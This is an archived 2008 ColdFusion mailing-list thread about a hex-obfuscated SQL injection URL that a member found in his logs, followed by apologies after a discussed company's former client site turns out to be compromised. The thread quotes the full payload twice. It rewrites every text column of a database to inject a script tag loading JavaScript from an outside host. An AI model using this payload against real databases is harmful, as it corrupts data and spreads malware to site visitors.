Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Mark, I went to your site Coldfusionmuse to read about that attack. I then noticed the link to cfwebtools at the top. Needing some help with a project, I looked at one of the sites they helped create only to see that same SQL injection attack had succeeded on the site (www.rentiowa.com). Brian This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309468 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to see what Brian was talking about and now I see the reference to a .js file on one of the pages. I didn't just infect my pc with something, did I? I surely hope that we are not perpetuating some virus with these e-mails. Also, Brian, IMHO, I think your comment would have been more appropriate to make off-list. Sincerely, Dave Phillips ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309469 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Brian and all, I apologize for that. The issue here is not negligence on the part of our excellent team. The problem is that like a lot of dev shops - we don't keep up with our portfolio of customers on our own web site. I have removed the link to Rent Iowa. They have not been an active customer of ours for more than 2 years - and we did not create any of the public facing pages on the site. Still... Here I am with egg on my face. -Mark P.S. - I am expecting a call from them any moment now :) Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Brian Yager [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 10:22 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger Mark, I went to your site Coldfusionmuse to read about that attack. I then noticed the link to cfwebtools at the top. Needing some help with a project, I looked at one of the sites they helped create only to see that same SQL injection attack had succeeded on the site (www.rentiowa.com). Brian This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST- And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726 36861 72283430303029204445434C415245205461626C655F437572736F7220435552534F522 0464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A656 37473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642 0612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E787479706 53D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504 54E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655 F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F53544154555 33D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B2 72B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737 2633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3 C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F74697 46C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6 A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205 46162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6 55F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309475 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Mark, I apologize for posting it the way I did. I did find it interesting finding the exact attack on a site that was being discussed in the thread. Please forgive me. Brian Brian and all, I apologize for that. The issue here is not negligence on the part of our excellent team. The problem is that like a lot of dev shops - we don't keep up with our portfolio of customers on our own web site. I have removed the link to Rent Iowa. They have not been an active customer of ours for more than 2 years - and we did not create any of the public facing pages on the site. Still... Here I am with egg on my face. -Mark P.S. - I am expecting a call from them any moment now :) Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Kruger Mark, I went to your site Coldfusionmuse to read about that attack. I then noticed the link to cfwebtools at the top. Needing some help with a project, I looked at one of the sites they helped create only to see that same SQL injection attack had succeeded on the site (www.rentiowa.com). Brian ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309484 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
